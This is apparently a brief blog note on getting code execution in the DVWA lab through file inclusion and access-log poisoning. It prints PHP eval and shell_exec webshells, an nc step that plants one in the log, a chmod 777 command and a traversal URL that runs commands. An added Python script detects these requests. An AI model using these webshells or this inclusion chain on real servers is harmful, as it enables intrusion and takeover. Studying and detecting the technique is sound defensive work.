Remote execution via file inclusion

<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?>

 

Writing to the log file

 

chmod 777 /var/log/httpd

 

nc xxx 80

<?php echo shell_exec($_GET['cmd']);?>

 

cat /var/log/httpd/access_log

 

xxx- - [08/Jan/2018:10:36:36 +0800] "<?php echo shell_exec($_GET['cmd']);?>" 400 226 "-" "-"

 

DVWA medium

 

 

 

http://xxx/dvwa/vulnerabilities/fi/?page=../../../../../../var/log/httpd/access_log&cmd=id

 

<?php @eval($_POST['x']);?>
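A detection sketch for the log-poisoning steps above, added here as an example and not part of the original post: it flags access-log entries whose request line carries a PHP tag, and requests whose parameters point an include at a log file. The sample lines are constructed from the entries shown above (documentation IP addresses substituted for the host), and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined format: host ident user [time] "request" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*?)" (\d{3}) \S+')
PHP_TAG = re.compile(r'<\?(?:php\b|=)', re.I)        # PHP open tag in a request line
TRAVERSAL = re.compile(r'\.\./|\.\.\\')               # ../ or ..\
LOG_PATH = re.compile(r'/var/log/|access[_.]log|error[_.]log', re.I)

# Constructed sample input, modelled on the log entry and URL in the post.
SAMPLE = """\
192.0.2.10 - - [08/Jan/2018:10:36:36 +0800] "<?php echo shell_exec($_GET['cmd']);?>" 400 226 "-" "-"
192.0.2.10 - - [08/Jan/2018:10:40:02 +0800] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../var/log/httpd/access_log&cmd=id HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Jan/2018:10:41:10 +0800] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1380 "-" "Mozilla/5.0"
""".splitlines()


def classify(line):
    """Return the list of findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    request = m.group(3)
    findings = []
    # A PHP tag in the request line means someone tried to plant code in the log.
    if PHP_TAG.search(unquote(request)):
        findings.append("php-tag-in-request")
    parts = request.split(" ")
    if len(parts) >= 2:
        query = urlsplit(parts[1]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decodes once; catch double encoding
            if TRAVERSAL.search(value):
                findings.append(f"traversal-in-param:{name}")
            if LOG_PATH.search(value):
                findings.append(f"log-path-in-param:{name}")
    return findings


def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one finding."""
    return {i: f for i, line in enumerate(lines, 1) if (f := classify(line))}


if __name__ == "__main__":
    for lineno, found in scan(SAMPLE).items():
        print(lineno, ", ".join(found))
```

A `php-tag-in-request` hit followed by a `log-path-in-param` hit from the same host is the pair to alert on; either one alone is already worth a look.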

 

 

 http://www.freebuf.com/articles/system/93323.html

 

posted @ 2018-01-08 09:44  Khazix